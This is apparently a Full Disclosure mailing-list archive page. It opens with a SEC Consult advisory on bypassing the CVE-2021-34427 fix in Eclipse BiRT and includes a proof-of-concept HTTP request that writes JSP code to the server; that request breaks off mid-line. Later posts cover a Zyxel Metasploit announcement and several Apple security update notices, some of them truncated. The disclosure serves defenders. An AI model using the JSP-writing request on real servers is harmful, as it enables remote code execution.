[FD] SEC Consult SA-20221216-0 :: Remote code execution bypass in Eclipse Business Intelligence Reporting Tool (BiRT)
SEC Consult Vulnerability Lab Security Advisory < 20221216-0 >
===
title: Remote code execution - CVE-2021-34427 bypass
product: Eclipse Business Intelligence Reporting Tool (BiRT)
vulnerable version: <= 4.11.0
fixed version: 4.12
CVE number: CVE-2021-34427
impact: High
homepage: https://eclipse.github.io/birt-website/
found: 2022-10-05
by: Armin Stock (Atos)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Atos company
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"With BIRT you can create data visualizations, dashboards and reports
that can be embedded into web applications and rich clients. Make information
out
of your data!"
https://eclipse.github.io/birt-website/
Business recommendation:
The vendor provides a patch which should be installed immediately.
Vulnerability overview/description:
---
1) Remote code execution - CVE-2021-34427 bypass
The vulnerability described in CVE-2021-34427
(https://www.cvedetails.com/cve/CVE-2021-34427/)
allows an attacker to execute code on the server, by creating a `.jsp` file
with the `BiRT - WebViewerExample`. This was fixed with the following code:
---
//
viewer/org.eclipse.birt.report.viewer/birt/WEB-INF/classes/org/eclipse/birt/report/context/ViewerAttributeBean.java#L1081
protected static void checkExtensionAllowedForRPTDocument(String
rptDocumentName) throws ViewerException {
int extIndex = rptDocumentName.lastIndexOf(".");
String extension = null;
boolean validExtension = true;
if (extIndex > -1 && (extIndex + 1) < rptDocumentName.length())
{
extension = rptDocumentName.substring(extIndex + 1);
if (!disallowedExtensionsForRptDocument.isEmpty()
&&
disallowedExtensionsForRptDocument.contains(extension)) {
validExtension = false;
}
if (!allowedExtensionsForRptDocument.isEmpty() &&
!allowedExtensionsForRptDocument.contains(extension)) {
validExtension = false;
}
if (!validExtension) {
throw new
ViewerException(BirtResources.getMessage(
ResourceConstants.ERROR_INVALID_EXTENSION_FOR_DOCUMENT_PARAMETER, new String[]
{ extension }));
}
}
}
---
This fix can be easily bypassed by adding `/.` to the filename which allows
an attacker to execute arbitrary code.
Proof of concept:
-
1) Remote code execution - CVE-2021-34427 bypass
The old exploit results in an error message:
---
GET /birt/document?__report=test.rptdesign=<@urlencode_all><%
out.println("OS: " + System.getProperty("os.name")); out.println("Current dir:
" +
getServletContext().getRealPath("/"));%><@/urlencode_all>&__document=<@urlencode>./test/info-new.jsp<@/urlencode>
HTTP/1.1
Host: IP:18080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,de-DE;q=0.5,de;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=C2A5FE509AD277742111569F8656881A
Upgrade-Insecure-Requests: 1
---
Response:
---
HTTP/1.1 200
Set-Cookie: JSESSIONID=A1E37E7FEC80DFFF155CAF9F642ADEB7; Path=/birt; HttpOnly
Content-Type: text/html;charset=utf-8
Date: Wed, 05 Oct 2022 06:14:54 GMT
Connection: close
Content-Length: 4644
Error
+
Invalid extension - "jsp" for the __document parameter.
---
But adding `/.` to the end of the filename creates the file on the server as
before:
---
GET /birt/document?__report=test.rptdesign=<@urlencode_all><%
out.println("OS: " + System.getProperty("os.name")); out.println("Current dir:
" +
[FD] SEC Consult Vulnerability Lab publication: The enemy from within: Unauthenticated Buffer Overflows in Zyxel routers still haunting users & metasploit exploit
Hi, earlier this year in February 2022, we published a technical security advisory - https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-multiple-zyxel-devices/ - on different critical vulnerabilities in Zyxel devices, resulting from insecure coding practices and insecure configuration. Those also included a highly critical unauthenticated buffer overflow vulnerability in the proprietary Zyxel web server which allowed remote root access to the device. The only prerequisite for the attacker: network-level access to the web interface, e.g. via Internet or LAN/WiFi. We have just released a blog post giving an overview about the critical buffer overflow vulnerability on a higher level, a list of the affected devices (it seems there still exist vulnerable devices on the Internet). We have also developed a Metasploit module to verify whether the buffer overflow vulnerability can still be exploited on one's own affected device. Blog post: https://r.sec-consult.com/zyxsploit Metasploit module: https://r.sec-consult.com/metazyx Exploit video: https://youtu.be/hbF3LEljxSA ~~~ SEC Consult Vulnerability Lab SEC Consult, an Atos company Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Atos company. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF / @2022 ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] APPLE-SA-2022-12-13-9 Safari 16.2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2022-12-13-9 Safari 16.2 Safari 16.2 addresses the following issues. Information about the security content is also available at https://support.apple.com/HT213537. WebKit Available for: macOS Big Sur and macOS Monterey Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A use after free issue was addressed with improved memory management. WebKit Bugzilla: 245521 CVE-2022-42867: Maddie Stone of Google Project Zero WebKit Available for: macOS Big Sur and macOS Monterey Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory consumption issue was addressed with improved memory handling. WebKit Bugzilla: 245466 CVE-2022-46691: an anonymous researcher WebKit Available for: macOS Big Sur and macOS Monterey Impact: Processing maliciously crafted web content may bypass Same Origin Policy Description: A logic issue was addressed with improved state management. WebKit Bugzilla: 246783 CVE-2022-46692: KirtiKumar Anandrao Ramchandani WebKit Available for: macOS Big Sur and macOS Monterey Impact: Processing maliciously crafted web content may result in the disclosure of process memory Description: The issue was addressed with improved memory handling. CVE-2022-42852: hazbinhotel working with Trend Micro Zero Day Initiative WebKit Available for: macOS Big Sur and macOS Monterey Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved input validation. WebKit Bugzilla: 246942 CVE-2022-46696: Samuel Groß of Google V8 Security WebKit Bugzilla: 247562 CVE-2022-46700: Samuel Groß of Google V8 Security WebKit Available for: macOS Big Sur and macOS Monterey Impact: Processing maliciously crafted web content may disclose sensitive user information Description: A logic issue was addressed with improved checks. CVE-2022-46698: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs & DNSLab, Korea Univ. WebKit Available for: macOS Big Sur and macOS Monterey Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved state management. WebKit Bugzilla: 247420 CVE-2022-46699: Samuel Groß of Google V8 Security WebKit Bugzilla: 244622 CVE-2022-42863: an anonymous researcher WebKit Available for: macOS Big Sur and macOS Monterey Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.1. Description: A type confusion issue was addressed with improved state handling. WebKit Bugzilla: 248266 CVE-2022-42856: Clément Lecigne of Google's Threat Analysis Group Additional recognition WebKit We would like to acknowledge an anonymous researcher, scarlet for their assistance. Safari 16.2 may be obtained from the Mac App Store. All information is also posted on the Apple Security Updates web site: https://support.apple.com/en-us/HT201222. This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -BEGIN PGP SIGNATURE- iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmOZFX0ACgkQ4RjMIDke NxniRQ/+LTObFcBEWogS56q3+7wjz2BgzBZYn4gwNGfvXf0zZfmXnTE0WXUolVa1 8/glHt7Tu5/KKfy6JDqmQvrF6fo2YpBgH0wrux/j4VPVCeaaOa2gXRAw0CBa4e4E OabGVEXEsgJjyE4MSMKh8Hn1VD4ANTPPKn5jWmDsCsSS2zEo94gD7Mkqh81CeFoV Yhmbv87nZAdEz2nHUkoM6PmN8SPAY5VtRp6i1rbkpcmMfs3VyA/ehnkfBGQK2xH7 vHpx2yyoXlqwR0zc7uHEge13e8kZ1Zh8UdIecgJuoyOvvmRR5DcchMFUYpUq8JcZ JOqN2lsRBu52WvoEGCkD80/PWamhD+CJWeMvgbvEZSOiNKKOSY1qO0w0NsGMPXCh 6xdcjfeTpslNn4zNUfaAwnUGIyxbIsNNHIgw3VX5GnFihpEsknBqbjxTLCBrDdFE T5xuHPBj7vXEW3V2ZXVt2MctWCr0GQdHt66C2m3gAEhL9xoN6YMEXLI0RVgUHmaf hOY/EZMIGm1cL33OvMKuvWCJuGW81+2+LJSwoscguhrj7Jb2qTOL2w06VDyNftuY F876pPWZgEj1O7DAtL9OP8IdrpSmQnAkvVUIZA6Sx3MaxTdl4f6lG4NlcsMGz+se PxxMCYWi8f/sPNxSdfoYardNkQcPsKm13UFu+Q9nSuV0A+x0qgA= =F0qN -END PGP SIGNATURE- ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] APPLE-SA-2022-12-13-8 watchOS 9.2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2022-12-13-8 watchOS 9.2 watchOS 9.2 addresses the following issues. Information about the security content is also available at https://support.apple.com/HT213536. Accounts Available for: Apple Watch Series 4 and later Impact: A user may be able to view sensitive user information Description: This issue was addressed with improved data protection. CVE-2022-42843: Mickey Jin (@patch1t) AppleAVD Available for: Apple Watch Series 4 and later Impact: Parsing a maliciously crafted video file may lead to kernel code execution Description: An out-of-bounds write issue was addressed with improved input validation. CVE-2022-46694: Andrey Labunets and Nikita Tarakanov AppleMobileFileIntegrity Available for: Apple Watch Series 4 and later Impact: An app may be able to bypass Privacy preferences Description: This issue was addressed by enabling hardened runtime. CVE-2022-42865: Wojciech Reguła (@_r3ggi) of SecuRing CoreServices Available for: Apple Watch Series 4 and later Impact: An app may be able to bypass Privacy preferences Description: Multiple issues were addressed by removing the vulnerable code. CVE-2022-42859: Mickey Jin (@patch1t), Csaba Fitzl (@theevilbit) of Offensive Security ImageIO Available for: Apple Watch Series 4 and later Impact: Processing a maliciously crafted file may lead to arbitrary code execution Description: An out-of-bounds write issue was addressed with improved input validation. CVE-2022-46693: Mickey Jin (@patch1t) IOHIDFamily Available for: Apple Watch Series 4 and later Impact: An app may be able to execute arbitrary code with kernel privileges Description: A race condition was addressed with improved state handling. CVE-2022-42864: Tommy Muir (@Muirey03) IOMobileFrameBuffer Available for: Apple Watch Series 4 and later Impact: An app may be able to execute arbitrary code with kernel privileges Description: An out-of-bounds write issue was addressed with improved input validation. CVE-2022-46690: John Aakerblom (@jaakerblom) iTunes Store Available for: Apple Watch Series 4 and later Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution Description: An issue existed in the parsing of URLs. This issue was addressed with improved input validation. CVE-2022-42837: an anonymous researcher Kernel Available for: Apple Watch Series 4 and later Impact: An app may be able to execute arbitrary code with kernel privileges Description: A race condition was addressed with additional validation. CVE-2022-46689: Ian Beer of Google Project Zero Kernel Available for: Apple Watch Series 4 and later Impact: A remote user may be able to cause kernel code execution Description: The issue was addressed with improved memory handling. CVE-2022-42842: pattern-f (@pattern_F_) of Ant Security Light-Year Lab Kernel Available for: Apple Watch Series 4 and later Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges Description: The issue was addressed with improved memory handling. CVE-2022-42845: Adam Doupé of ASU SEFCOM libxml2 Available for: Apple Watch Series 4 and later Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution Description: An integer overflow was addressed through improved input validation. CVE-2022-40303: Maddie Stone of Google Project Zero libxml2 Available for: Apple Watch Series 4 and later Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution Description: This issue was addressed with improved checks. CVE-2022-40304: Ned Williamson and Nathan Wachholz of Google Project Zero Safari Available for: Apple Watch Series 4 and later Impact: Visiting a website that frames malicious content may lead to UI spoofing Description: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation. CVE-2022-46695: KirtiKumar Anandrao Ramchandani Software Update Available for: Apple Watch Series 4 and later Impact: A user may be able to elevate privileges Description: An access issue existed with privileged API calls. This issue was addressed with additional restrictions. CVE-2022-42849: Mickey Jin (@patch1t) Weather Available for: Apple Watch Series 4 and later Impact: An app may be able to read sensitive location information Description: The issue was addressed with improved handling of caches. CVE-2022-42866: an anonymous researcher WebKit Available for: Apple Watch Series 4 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A use after free issue was addressed with improved memory management. WebKit Bugzilla: 245521 CVE-2022-42867: Maddie Stone of Google Project Zero WebKit Available for: Apple Watch Series 4 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory consumption issue was
[FD] APPLE-SA-2022-12-13-7 tvOS 16.2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2022-12-13-7 tvOS 16.2 tvOS 16.2 addresses the following issues. Information about the security content is also available at https://support.apple.com/HT213535. Accounts Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: A user may be able to view sensitive user information Description: This issue was addressed with improved data protection. CVE-2022-42843: Mickey Jin (@patch1t) AppleAVD Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: Parsing a maliciously crafted video file may lead to kernel code execution Description: An out-of-bounds write issue was addressed with improved input validation. CVE-2022-46694: Andrey Labunets and Nikita Tarakanov AppleMobileFileIntegrity Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: An app may be able to bypass Privacy preferences Description: This issue was addressed by enabling hardened runtime. CVE-2022-42865: Wojciech Reguła (@_r3ggi) of SecuRing AVEVideoEncoder Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: An app may be able to execute arbitrary code with kernel privileges Description: A logic issue was addressed with improved checks. CVE-2022-42848: ABC Research s.r.o ImageIO Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: Processing a maliciously crafted file may lead to arbitrary code execution Description: An out-of-bounds write issue was addressed with improved input validation. CVE-2022-46693: Mickey Jin (@patch1t) ImageIO Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: Parsing a maliciously crafted TIFF file may lead to disclosure of user information Description: The issue was addressed with improved memory handling. CVE-2022-42851: Mickey Jin (@patch1t) IOHIDFamily Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: An app may be able to execute arbitrary code with kernel privileges Description: A race condition was addressed with improved state handling. CVE-2022-42864: Tommy Muir (@Muirey03) IOMobileFrameBuffer Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: An app may be able to execute arbitrary code with kernel privileges Description: An out-of-bounds write issue was addressed with improved input validation. CVE-2022-46690: John Aakerblom (@jaakerblom) Kernel Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: An app may be able to execute arbitrary code with kernel privileges Description: A race condition was addressed with additional validation. CVE-2022-46689: Ian Beer of Google Project Zero Kernel Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: Connecting to a malicious NFS server may lead to arbitrary code execution with kernel privileges Description: The issue was addressed with improved bounds checks. CVE-2022-46701: Felix Poulin-Belanger Kernel Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: A remote user may be able to cause kernel code execution Description: The issue was addressed with improved memory handling. CVE-2022-42842: pattern-f (@pattern_F_) of Ant Security Light-Year Lab Kernel Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges Description: The issue was addressed with improved memory handling. CVE-2022-42845: Adam Doupé of ASU SEFCOM libxml2 Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution Description: An integer overflow was addressed through improved input validation. CVE-2022-40303: Maddie Stone of Google Project Zero libxml2 Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution Description: This issue was addressed with improved checks. CVE-2022-40304: Ned Williamson and Nathan Wachholz of Google Project Zero Preferences Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: An app may be able to use arbitrary entitlements Description: A logic issue was addressed with improved state management. CVE-2022-42855: Ivan Fratric of Google Project Zero Safari Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: Visiting a website that frames malicious content may lead to UI spoofing Description: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation. CVE-2022-46695: KirtiKumar Anandrao
[FD] APPLE-SA-2022-12-13-6 macOS Big Sur 11.7.2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2022-12-13-6 macOS Big Sur 11.7.2 macOS Big Sur 11.7.2 addresses the following issues. Information about the security content is also available at https://support.apple.com/HT213534. BOM Available for: macOS Big Sur Impact: An app may bypass Gatekeeper checks Description: A logic issue was addressed with improved checks. CVE-2022-42821: Jonathan Bar Or of Microsoft DriverKit Available for: macOS Big Sur Impact: An app may be able to execute arbitrary code with kernel privileges Description: The issue was addressed with improved memory handling. CVE-2022-32942: Linus Henze of Pinauten GmbH (pinauten.de) IOHIDFamily Available for: macOS Big Sur Impact: An app may be able to execute arbitrary code with kernel privileges Description: A race condition was addressed with improved state handling. CVE-2022-42864: Tommy Muir (@Muirey03) Kernel Available for: macOS Big Sur Impact: An app may be able to execute arbitrary code with kernel privileges Description: A race condition was addressed with additional validation. CVE-2022-46689: Ian Beer of Google Project Zero Kernel Available for: macOS Big Sur Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges Description: The issue was addressed with improved memory handling. CVE-2022-42845: Adam Doupé of ASU SEFCOM Kernel Available for: macOS Big Sur Impact: A remote user may be able to cause kernel code execution Description: The issue was addressed with improved memory handling. CVE-2022-42842: pattern-f (@pattern_F_) of Ant Security Light-Year Lab libxml2 Available for: macOS Big Sur Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution Description: An integer overflow was addressed through improved input validation. CVE-2022-40303: Maddie Stone of Google Project Zero libxml2 Available for: macOS Big Sur Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution Description: This issue was addressed with improved checks. CVE-2022-40304: Ned Williamson and Nathan Wachholz of Google Project Zero ppp Available for: macOS Big Sur Impact: An app may be able to execute arbitrary code with kernel privileges Description: The issue was addressed with improved memory handling. CVE-2022-42840: an anonymous researcher xar Available for: macOS Big Sur Impact: Processing a maliciously crafted package may lead to arbitrary code execution Description: A type confusion issue was addressed with improved checks. CVE-2022-42841: Thijs Alkemade (@xnyhps) of Computest Sector 7 macOS Big Sur 11.7.2 may be obtained from the Mac App Store or Apple's Software Downloads web site: https://support.apple.com/downloads/ All information is also posted on the Apple Security Updates web site: https://support.apple.com/en-us/HT201222. This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -BEGIN PGP SIGNATURE- iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmOZFX8ACgkQ4RjMIDke NxkRHhAAks97Igh9fqeJEOOZuhjhTyUVSE7EVIDdqHx/YUX7BHIWbloEPHRFkkVH Sk1b94874939VVbt4yBnECvPhuCctdtejYapZRiIJhmNTcFUUXhXeBDUU8Gf5dG5 80fRmuFL18HSKpNQSnC6ExO+6a1J5l+B9ifLWgqi18YkbyCkqwsdob6q0IpIgs2G JzqvhfNAjF9fdDIui8rbIBqXM/Ak/N09k4QIqEMkyMIAucIh5YebKNgBSP5jH/tF dXIcZb4TKV0KblQRLSCvvHYDYmNB6A1uVeoTgsvWg6x3DQTNLN7sq6CJX4llInJP g3eZA6vv5LkxOm18RqgbyzknyMWkhfrJKf304oHNym47qw4pGBDvC6AQwZDFOdTw 60fDz+8weKRKNVCSEUAOEePrHcqV/9VdyNbnyxYDYr7DlVS4h4Yls+VD3Fn1pmkF f2+9CEGJe3cyzm7HO1pM8+seTvnYGPkSugaaEBxeUA1t3Q8alQEIgR4gXJwUqjKw vUVfdwVRN8S/UJ9XiAg93EKbi/kwSZ9RC4F8EPVsal/tKMMmawJDzHCJgA8ZyzGZ ODXpLQPPOs112BuyrtjLbMTQe7ZL+HKH4i1dwUqEbPYLsioBPqdKkwHynXXZpMGc 6vwn45KYrP3A98IH8U8rngxinRtRFZiwcF7/gZdYlty+wg+bl4k= =OFIf -END PGP SIGNATURE- ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] APPLE-SA-2022-12-13-5 macOS Monterey 12.6.2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2022-12-13-5 macOS Monterey 12.6.2 macOS Monterey 12.6.2 addresses the following issues. Information about the security content is also available at https://support.apple.com/HT213533. Bluetooth Available for: macOS Monterey Impact: An app may be able to disclose kernel memory Description: The issue was addressed with improved memory handling. CVE-2022-42854: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd. (@starlabs_sg) BOM Available for: macOS Monterey Impact: An app may bypass Gatekeeper checks Description: A logic issue was addressed with improved checks. CVE-2022-42821: Jonathan Bar Or of Microsoft DriverKit Available for: macOS Monterey Impact: An app may be able to execute arbitrary code with kernel privileges Description: The issue was addressed with improved memory handling. CVE-2022-32942: Linus Henze of Pinauten GmbH (pinauten.de) File System Available for: macOS Monterey Impact: An app may be able to break out of its sandbox Description: This issue was addressed with improved checks. CVE-2022-42861: pattern-f (@pattern_F_) of Ant Security Light-Year Lab IOHIDFamily Available for: macOS Monterey Impact: An app may be able to execute arbitrary code with kernel privileges Description: A race condition was addressed with improved state handling. CVE-2022-42864: Tommy Muir (@Muirey03) Kernel Available for: macOS Monterey Impact: An app may be able to execute arbitrary code with kernel privileges Description: A race condition was addressed with additional validation. CVE-2022-46689: Ian Beer of Google Project Zero Kernel Available for: macOS Monterey Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges Description: The issue was addressed with improved memory handling. CVE-2022-42845: Adam Doupé of ASU SEFCOM Kernel Available for: macOS Monterey Impact: A remote user may be able to cause kernel code execution Description: The issue was addressed with improved memory handling. CVE-2022-42842: pattern-f (@pattern_F_) of Ant Security Light-Year Lab libxml2 Available for: macOS Monterey Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution Description: An integer overflow was addressed through improved input validation. CVE-2022-40303: Maddie Stone of Google Project Zero libxml2 Available for: macOS Monterey Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution Description: This issue was addressed with improved checks. CVE-2022-40304: Ned Williamson and Nathan Wachholz of Google Project Zero ppp Available for: macOS Monterey Impact: An app may be able to execute arbitrary code with kernel privileges Description: The issue was addressed with improved memory handling. CVE-2022-42840: an anonymous researcher Preferences Available for: macOS Monterey Impact: An app may be able to use arbitrary entitlements Description: A logic issue was addressed with improved state management. CVE-2022-42855: Ivan Fratric of Google Project Zero xar Available for: macOS Monterey Impact: Processing a maliciously crafted package may lead to arbitrary code execution Description: A type confusion issue was addressed with improved checks. CVE-2022-42841: Thijs Alkemade (@xnyhps) of Computest Sector 7 macOS Monterey 12.6.2 may be obtained from the Mac App Store or Apple's Software Downloads web site: https://support.apple.com/downloads/ All information is also posted on the Apple Security Updates web site: https://support.apple.com/en-us/HT201222. This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -BEGIN PGP SIGNATURE- iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmOZFX8ACgkQ4RjMIDke NxmuDw/7B+dpr+R5V7L8iLPTeaWmYdo95V9eKbSoUaNMWy+zqAMTpjpybr8t04KE SlKg1LGUBtE0Yu+Hk8XH5w9cp9EmthJlViaQj/ARhQnaJAb6d4c7fVE/b70aFlB2 LyGSwW7J2U7jJVT/DLNJRLPy57hql9hCONY0qZzGvF7cogjeyy3CKQx6JQoRcxP+ BkwSgXX1BxscWkjtQkNnDEDJYWj04MxmTj+EVeoOmkDlXcSypYCBEAKz7474Hnql /lZYe8a+SupwOrXnJUusobAK8fUDN7tfmrr5Zg6F7mBGe6BDNX7E6BZ3hb8NH/sz w0BBUU4aLCAVFbgllNLGQqsWif4/julEaSneEtStrJDgNWaXbrhrTWAYzMfJIGoF nGWYmWUY8YR53zeC1egMvHoHnLFzIXGOWmKdWhahSMygHb1R5i8wdCcv+M1iL3BB pthnd3XnZiOcEo4Z2XazFJV2YQ6juDPcXFgS0fBsNBS7LvMKBia/ax3CGwAxEagM yLOgcgIIbdg6DM72siMOpfScB7EPcFIBb1H6IHBZMhRg0NRKMTB9tNE0rgQ+OYUN Ze1wkPo8FH1lCunDcSZ1v6JzGZRN/o3woaR3LHVYEPWe3zJY2YvaqRrD/QfjqsMm 5o/94MyoeFn0WM6lXhqlBZvn8HtYDmFNu4VFt6ZjiL13CohaL2U= =U7h6 -END PGP SIGNATURE- ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] APPLE-SA-2022-12-13-4 macOS Ventura 13.1
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2022-12-13-4 macOS Ventura 13.1 macOS Ventura 13.1 addresses the following issues. Information about the security content is also available at https://support.apple.com/HT213532. Accounts Available for: macOS Ventura Impact: A user may be able to view sensitive user information Description: This issue was addressed with improved data protection. CVE-2022-42843: Mickey Jin (@patch1t) AMD Available for: macOS Ventura Impact: An app may be able to execute arbitrary code with kernel privileges Description: An out-of-bounds write issue was addressed with improved input validation. CVE-2022-42847: ABC Research s.r.o. AppleMobileFileIntegrity Available for: macOS Ventura Impact: An app may be able to bypass Privacy preferences Description: This issue was addressed by enabling hardened runtime. CVE-2022-42865: Wojciech Reguła (@_r3ggi) of SecuRing Bluetooth Available for: macOS Ventura Impact: An app may be able to disclose kernel memory Description: The issue was addressed with improved memory handling. CVE-2022-42854: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd. (@starlabs_sg) Boot Camp Available for: macOS Ventura Impact: An app may be able to modify protected parts of the file system Description: An access issue was addressed with improved access restrictions. CVE-2022-42853: Mickey Jin (@patch1t) of Trend Micro CoreServices Available for: macOS Ventura Impact: An app may be able to bypass Privacy preferences Description: Multiple issues were addressed by removing the vulnerable code. CVE-2022-42859: Mickey Jin (@patch1t), Csaba Fitzl (@theevilbit) of Offensive Security DriverKit Available for: macOS Ventura Impact: An app may be able to execute arbitrary code with kernel privileges Description: The issue was addressed with improved memory handling. CVE-2022-32942: Linus Henze of Pinauten GmbH (pinauten.de) ImageIO Available for: macOS Ventura Impact: Processing a maliciously crafted file may lead to arbitrary code execution Description: An out-of-bounds write issue was addressed with improved input validation. CVE-2022-46693: Mickey Jin (@patch1t) IOHIDFamily Available for: macOS Ventura Impact: An app may be able to execute arbitrary code with kernel privileges Description: A race condition was addressed with improved state handling. CVE-2022-42864: Tommy Muir (@Muirey03) IOMobileFrameBuffer Available for: macOS Ventura Impact: An app may be able to execute arbitrary code with kernel privileges Description: An out-of-bounds write issue was addressed with improved input validation. CVE-2022-46690: John Aakerblom (@jaakerblom) IOMobileFrameBuffer Available for: macOS Ventura Impact: An app may be able to execute arbitrary code with kernel privileges Description: An out-of-bounds access issue was addressed with improved bounds checking. CVE-2022-46697: John Aakerblom (@jaakerblom) and Antonio Zekic (@antoniozekic) iTunes Store Available for: macOS Ventura Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution Description: An issue existed in the parsing of URLs. This issue was addressed with improved input validation. CVE-2022-42837: Weijia Dai (@dwj1210) of Momo Security Kernel Available for: macOS Ventura Impact: An app may be able to execute arbitrary code with kernel privileges Description: A race condition was addressed with additional validation. CVE-2022-46689: Ian Beer of Google Project Zero Kernel Available for: macOS Ventura Impact: Connecting to a malicious NFS server may lead to arbitrary code execution with kernel privileges Description: The issue was addressed with improved bounds checks. CVE-2022-46701: Felix Poulin-Belanger Kernel Available for: macOS Ventura Impact: A remote user may be able to cause kernel code execution Description: The issue was addressed with improved memory handling. CVE-2022-42842: pattern-f (@pattern_F_) of Ant Security Light-Year Lab Kernel Available for: macOS Ventura Impact: An app may be able to break out of its sandbox Description: This issue was addressed with improved checks. CVE-2022-42861: pattern-f (@pattern_F_) of Ant Security Light-Year Lab Kernel Available for: macOS Ventura Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges Description: The issue was addressed with improved memory handling. CVE-2022-42845: Adam Doupé of ASU SEFCOM Photos Available for: macOS Ventura Impact: Shake-to-undo may allow a deleted photo to be re-surfaced without authentication Description: The issue was addressed with improved bounds checks. CVE-2022-32943: an anonymous researcher ppp Available for: macOS Ventura Impact: An app may be able to execute arbitrary code with kernel privileges Description: The issue was addressed with improved memory handling. CVE-2022-42840: an anonymous researcher Preferences Available for: macOS Ventura Impact: An app may be able to use arbitrary entitlements Description: A
[FD] APPLE-SA-2022-12-13-3 iOS 16.1.2
